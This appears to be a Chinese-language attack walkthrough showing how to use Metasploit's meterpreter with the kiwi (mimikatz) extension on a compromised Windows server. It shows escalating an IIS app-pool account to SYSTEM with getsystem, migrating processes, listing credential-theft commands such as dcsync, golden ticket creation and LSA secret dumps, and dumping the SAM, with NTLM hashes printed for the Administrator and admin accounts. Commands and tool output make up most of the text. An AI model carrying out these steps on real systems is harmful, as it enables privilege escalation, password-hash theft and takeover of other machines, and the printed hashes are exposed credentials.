kiwi模块:
mimikatz模块已经合并为kiwi模块;使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。
提权到system权限:
1.1 提到system有两个方法:
一是当前的权限是administrator用户;
二是利用其它手段先提权到administrator用户。然后administrator用户可以直接在meterpreter_shell中使用命令getsystem提权到system权限。
1.2 进行提权:
getuid #查看当前会话用户身份
getsystem #自动尝试提权
当前是普通权限
meterpreter > getuid
Server username: IIS APPPOOL\web
通过getsystem提权成功
meterpreter > getsystem -t 6
...got system via technique 6 (Named Pipe Impersonation (EFSRPC variant - AKA E fsPotato)).
同通过ps查看进程
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
300 4 smss.exe x64 0
316 616 sqlservr.exe x64 0 NT SERVICE\MSSQLSERVER C:\Program Files\Microsoft SQL Serve
r\MSSQL12.MSSQLSERVER\MSSQL\Binn\sql
servr.exe
328 616 vsvnhttpsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Program Files\VisualSVN Server\bi
n\vsvnhttpsvc.exe
360 932 WUDFHost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\WUDFHost.exe
396 388 csrss.exe x64 0
416 720 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.ex
e
476 388 wininit.exe x64 0
484 468 csrss.exe x64 1
572 468 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
580 1104 taskhostw.exe x64 2 172_19_0_5\admin C:\Windows\System32\taskhostw.exe
616 476 services.exe x64 0
632 476 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
648 616 svchost.exe x64 2 172_19_0_5\admin C:\Windows\System32\svchost.exe
720 616 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
784 616 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
880 572 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\LogonUI.exe
888 572 dwm.exe x64 1 Window Manager\DWM-1 C:\Windows\System32\dwm.exe
924 616 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
932 616 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1020 616 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1064 616 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1096 616 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1104 616 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1244 616 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1264 616 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1276 720 ChsIME.exe x64 2 172_19_0_5\admin C:\Windows\System32\InputMethod\CHS\
ChsIME.exe
1752 616 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1820 616 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1864 616 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1892 616 BaradAgent.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\QCloud\Monitor\Bara
d\BaradAgent.exe
1968 616 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1992 616 sqlwriter.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Microsoft SQL Serve
r\90\Shared\sqlwriter.exe
2000 616 sgagent.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\QCloud\Stargate\sga
gent.exe
2008 616 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2020 616 tat_agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\QCloud\tat_agent\ta
迁移进程
meterpreter > migrate 3820
[*] Migrating from 5320 to 3820...
[*] Migration completed successfully.
加载 load mimikatz
meterpreter > load mimikatz
[!] The "mimikatz" extension has been replaced by "kiwi". Please use this in future.
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
通过help kiwi 查看帮助
meterpreter > help kiwi
Kiwi Commands
=============
Command Description
------- -----------
creds_all Retrieve all credentials (parsed)
creds_kerberos Retrieve Kerberos creds (parsed)
creds_livessp Retrieve Live SSP creds
creds_msv Retrieve LM/NTLM creds (parsed)
creds_ssp Retrieve SSP creds
creds_tspkg Retrieve TsPkg creds (parsed)
creds_wdigest Retrieve WDigest creds (parsed)
dcsync Retrieve user account information via DCSync (unparsed)
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create Create a golden kerberos ticket
kerberos_ticket_list List all kerberos tickets (unparsed)
kerberos_ticket_purge Purge any in-use kerberos tickets
kerberos_ticket_use Use a kerberos ticket
kiwi_cmd Execute an arbitary mimikatz command (unparsed)
lsa_dump_sam Dump LSA SAM (unparsed)
lsa_dump_secrets Dump LSA secrets (unparsed)
password_change Change the password/hash of a user
wifi_list List wifi profiles/creds for the current user
wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)
一些有关密码和凭据的命令:
creds_all: #列举所有凭据
creds_kerberos: #列举所有kerberos凭据
creds_msv: #列举所有msv凭据
creds_ssp: #列举所有ssp凭据
creds_tspkg: #列举所有tspkg凭据
creds_wdigest: #列举所有wdigest凭据
dcsync: #通过DCSync检索用户帐户信息
dcsync_ntlm: #通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create: #创建黄金票据
kerberos_ticket_list: #列举kerberos票据
kerberos_ticket_purge: #清除kerberos票据
kerberos_ticket_use: #使用kerberos票据
kiwi_cmd: #执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam: #dump出lsa的SAM
lsa_dump_secrets: #dump出lsa的密文
password_change: #修改密码
wifi_list: #列出当前用户的wifi配置文件
wifi_list_shared: #列出共享wifi配置文件/编码
直接拿到
meterpreter > lsa_dump_sam
[+] Running as SYSTEM
[*] Dumping SAM
Domain : 172_19_0_5
SysKey : 6a1d3295e5ce0aa1eb9871750b8a0942
Local SID : S-1-5-21-3925609119-1055855973-2504285507
SAMKey : a7560bed1540bf80158f27e92e672d72
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 3f10b4bc33875a54c357b013abdbbb6e
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000003f1 (1009)
User : admin
Hash NTLM: 4b37422333f67ebc8778d798ad2af741